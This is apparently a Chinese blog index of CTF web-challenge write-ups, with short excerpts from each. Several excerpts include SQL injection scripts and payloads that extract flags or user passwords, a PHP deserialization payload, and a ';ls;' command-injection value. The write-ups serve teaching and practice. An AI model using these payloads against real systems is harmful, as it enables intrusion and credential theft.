比赛复现
文章平均质量分 64
succ3
Everything is done, like a dream bubble!
展开
-
b01lers CTF web 复现
这题考的是 `xss` 中的表单劫持,和一点点 `csp` 的绕过。在页面中可以看到 `default-src 'none';` 以及一些其他的限制,可以用 `meta` 标签来进行 `url` 重定向。例如:这里面的 1 是延迟 1 秒后跳转。原创 2023-03-21 14:18:27 · 772 阅读 · 0 评论 -
ACSC 2023 比赛复现
在 index.php 中可以看到需要访问者是 admin 权限,才可以看到 flag。report.php 中可以让 admin bot 访问我们输入的 url,那么也就是说可以访问 addadmin.php 添加用户。原创 2023-02-26 15:00:29 · 506 阅读 · 0 评论 -
西湖论剑 2023 比赛复现
在copy 路由会检验 ip 地址是否为 127.0.0.1,且请求体不能有__proto__。在 curl 路由中我们可以用http 请求走私来访问 copy 从而可以绕过 copy 路由里面的 ip 检测,然后利用constructor.prototype 替代__proto__,最后打ejs就行了。原创 2023-02-11 18:54:57 · 1355 阅读 · 0 评论 -
idekCTF 2022 比赛复现
上面这串代码会从下标从 0 开始一直到最后的字符串转换为十进制数输出。我们看一下源码,开头的几段告诉我们设置了一个哈希密码,然后把这个密码复制到 randomData 数组的 12625 位置后面。原创 2023-02-11 15:33:52 · 606 阅读 · 0 评论 -
安洵杯 2022 复现
安洵杯 2022 复现原创 2022-11-28 14:56:25 · 1183 阅读 · 0 评论 -
RCE极限挑战
RCE极限挑战原创 2022-11-23 16:52:50 · 721 阅读 · 0 评论 -
TAMU复现
Triplet在源码处有现成的Lock Out每次我们登录不成功就会重定向一个flag页面,我们可以拦截他的响应,来获取flag,这边有两种方法。0x01加上PrintFlag参数,我们可以看到在302页面有个get传。0x02勾选上此选项然后就可拦截响应并修改了,我们把302页面改为200,在发送,然后在页面上点击printflag就行了。Serial Killer抓包可以看到一串经过base64编码的序列化。解码后可以看到访问文件处。O:7:"GetPage":1:{原创 2022-04-19 10:01:28 · 93 阅读 · 0 评论 -
PatriotCTF
Rock and Roll可以用curl -i查看网页的响应头和主体,也可以抓包。Inspector Clouseau直接查看源码获取spongebob由代码可知,可以用分号隔开命令。";ls;"<?php$text = $_POST['text'];$command = "python3.9 memetext.py \"$text\"";$out = shell_exec($command);echo $out;?>最后查看就可以了。Apocalypse原创 2022-05-03 22:23:54 · 288 阅读 · 0 评论 -
crewctf复现
目录Uploadz参考分析expUploadz参考https://github.com/ixSly/CTFs/tree/master/CrewCTF#uploadz-web分析对代码的简单静态分析表明存在竞争条件的空间,因为我们的文件按原样上传到临时文件夹中,然后我们需要一秒钟才能访问该文件,之后使用取消链接将其删除。为了解决这个问题,我们显然需要一个脚本,然后就是计划一次成功的攻击以实现 RCE。 我遇到的一个问题是 PHP 不可执行,所以我决定上传两个文件:1- 一个 .htaccess原创 2022-04-19 10:02:21 · 114 阅读 · 0 评论 -
VNCTF2022公开赛
gocalc000x1预期解点击把session拿去解码一下(末尾有==base64解码一下)两次编码就出来了(本来我以为)00x2非预期解import ( _ "embed" "fmt" "os" "reflect" "strings" "text/template" "github.com/gin-contrib/sessions" "github.com/gin-contrib/sessions/cookie" "github.com/gin-gonic/gi原创 2022-03-15 23:01:43 · 394 阅读 · 0 评论 -
NahamCon CTF 2022
Flask Metal Alchemist没有回显,没有报错,只有金属元素的排序,那么我们是否可以通过判断金属元素的排序是否正确来进行布尔盲注。从app.py中可以看出有两个功能,search和order,且它只过滤了金属名字,并没有过滤order名字。@app.route("/", methods=["GET", "POST"])def index(): if request.method == "POST": search = "" order = No原创 2022-05-03 09:42:53 · 858 阅读 · 0 评论 -
网刃***
uploadupdatexml报错注入import requestsurl = "http://124.222.24.150:8001/index.php"sql = "1' and updatexml(0x7e,concat(0x7e,(select flag from flag)),0x7e)or'"#sql = "1' and updatexml(0x7e,concat(0x7e,(select substr(flag,20,20) from flag)),0x7e)or'"file原创 2022-04-27 17:03:09 · 233 阅读 · 0 评论 -
mrctf
webcheckin这边的后台检测有点迷,只要再payload前加些其他数据就可以绕过。例如:<?phpclass Modifier { protected $var='php://filter/read=convert.base64-encode/resource=flag.php';}class Show{ public $source; public $str; public function __construct($file='index.ph原创 2022-04-27 09:34:53 · 1034 阅读 · 0 评论 -
angstromctf复现
目录crumbsXtra Salty SardinesArt Gallerycrumbs由源码可以看出,只要知道curr在何值时键值为flag就可以了。import requestsimport reurl = "https://crumbs.web.actf.co/"req = requests.get(url)result = req.text[6:]for i in range(1000): req = requests.get(url+result) result =原创 2022-05-08 19:31:24 · 532 阅读 · 0 评论 -
两小时AK赛
WEB - 签到了!!!你会玩2048么?main.jsWEB - easy_unser__wakeup可以把序列化后的属性个数改一下就可以绕过了。?catf1ag=O:7:"catf1ag":2:{s:6:"target";s:26:"<?php include('/flag'); ?>";}MISC - 签签base64解码一下就可以了WEB - 你猜猜是什么注入?经测试cat,/,|,tee可以用,虽然页面不能回显,但是我们可以把结果保存到文件中。?catf1ag=原创 2022-05-10 16:11:20 · 304 阅读 · 0 评论 -
2022年春秋杯网络安全联赛春季赛 勇者山峰
Mercy-codeif (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd))这个过滤就代表了是无参rce。<?phphighlight_file(__FILE__);if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { echo chr(strrev(un原创 2022-05-08 17:13:59 · 1312 阅读 · 0 评论 -
强网拟态 2022 web复现
比赛复现原创 2022-11-13 16:25:42 · 414 阅读 · 0 评论 -
oh-my-lotto
知识点:改变环境变量绕过wgetmd5爆破import hashlibfor i in range(1000000000): a = hashlib.md5(str(i).encode('utf-8')).hexdigest() if a[0:6] == '0c5fbf': print(i) print(a)关键是三个路由。result路由,返回一个他给定的值,也就是我们要预测的值。@app.route("/result", methods原创 2022-04-22 21:36:03 · 647 阅读 · 0 评论 -
oh-my-notepro
知识点:求pin码登录页面后测试可以发现在note_id处可以sql注入。%27union%20select%201,2,3,version(),(select%20group_concat(username,0x3a,password)%20from%20users);%23可以得到用户名和密码,但用处不大。pin码可以用pin码登录控制台来3.8的pin码计算脚本如下,需要以下信息:username,用户名,可以读取/etc/passwd得到modname,默认值为flask原创 2022-04-21 20:07:25 · 1534 阅读 · 0 评论 -
DCTF复现
目录SQL Tutor参考分析理一理攻击思路:攻击脚本BookStore.java参考SQL Tutor参考https://hussienmisbah.github.io/post/sql-tutor/分析过滤很多关键词。先抓包试一下。POST /verify_and_sign_text HTTP/2Host: sqltutor.dragonsec.siUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko原创 2022-04-19 10:04:38 · 2409 阅读 · 0 评论 -
SECCON CTF 2022 web复现
SECCON CTF 2022 web复现原创 2022-11-20 18:09:43 · 751 阅读 · 0 评论 -
CISCN 2022 初赛 web 复现
比赛复现原创 2022-11-17 20:57:08 · 1564 阅读 · 0 评论